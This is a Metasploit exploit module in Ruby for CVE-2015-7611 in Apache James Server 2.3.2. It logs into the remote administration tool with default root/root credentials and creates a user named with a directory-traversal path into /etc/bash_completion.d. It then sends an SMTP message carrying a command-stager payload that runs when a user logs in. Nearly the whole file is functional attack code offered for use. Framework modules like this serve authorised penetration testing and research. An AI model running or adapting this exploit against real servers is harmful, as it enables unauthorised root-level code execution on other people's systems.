metasploit-gs/modules/exploits/linux/smtp/apache_james_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
      'Description'    => %q{
        To use this module, start a listener using the given payload, host, and
        port before running the exploit. After running the exploit, the payload
        will be executed when a user logs into the system. This module exploits
        a vulnerability that exists due to a lack of input validation when
        creating a user. Messages for a given user are stored in a directory
        partially defined by the username. By creating a user with a directory
        traversal payload as the username, commands can be written to a given
        directory. For this exploit, bash completion must be enabled to
        gain code execution. This exploit will leave 2 Apache James mail
        object artifacts in the /etc/bash_completion.d directory and the
        malicious user account.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Palaczynski Jakub', # Discovery
        'Matthew Aberegg',   # Metasploit
        'Michael Burkey'     # Metasploit
      ],
      'References'     =>
      [
        [ 'CVE', '2015-7611' ],
        [ 'EDB', '35513' ],
        [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
      ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
      [
        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
      ],
      'Privileged'     => true,
      'DisclosureDate' => "Oct 1 2015",
      'DefaultTarget'  => 0,
      'CmdStagerFlavor'=> [ 'printf' ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true'
        }
      ))
      register_options(
        [
          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
        ])
      deregister_options('SRVHOST', 'SRVPORT')
  end

  def check
    # SMTP service check
    connect
    smtp_banner = sock.get_once
    disconnect
    unless smtp_banner =~ /JAMES SMTP Server/
      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
    end

    # James Remote Administration Tool service check
    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
    admin_banner = sock.get_once
    disconnect
    unless admin_banner =~ /JAMES Remote Administration Tool/
      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
    end

    # Get version number
    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
    # Null check
    unless version
      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
    end
    # Create version objects
    target_version = Gem::Version.new(version)
    vulnerable_version = Gem::Version.new("2.3.2")

    # Check version number
    if target_version > vulnerable_version
      return CheckCode::Safe
    elsif target_version == vulnerable_version
      return CheckCode::Appears
    elsif target_version < vulnerable_version
      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
    end
  end

  def execute_command(cmd, opts = {})
    # Create malicious user (message objects for this user will now be stored in /etc/bash_completion.d)
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
    sock.get_once
    sock.puts(username + "\n")
    sock.get_once
    sock.puts(password + "\n")
    sock.get_once
    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    sock.get_once
    sock.puts("quit\n")
    disconnect

    # Send payload via SMTP
    connect
    sock.puts("ehlo admin@apache.com\r\n")
    sock.get_once
    sock.puts("mail from: <'@apache.com>\r\n")
    sock.get_once
    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    sock.get_once
    sock.puts("data\r\n")
    sock.get_once
    sock.puts("From: admin@apache.com\r\n")
    sock.puts("\r\n")
    sock.puts("'\n")
    sock.puts("#{cmd}\n")
    sock.puts("\r\n.\r\n")
    sock.get_once
    sock.puts("quit\r\n")
    sock.get_once
    disconnect
  end

  def exploit
    execute_cmdstager
  end

end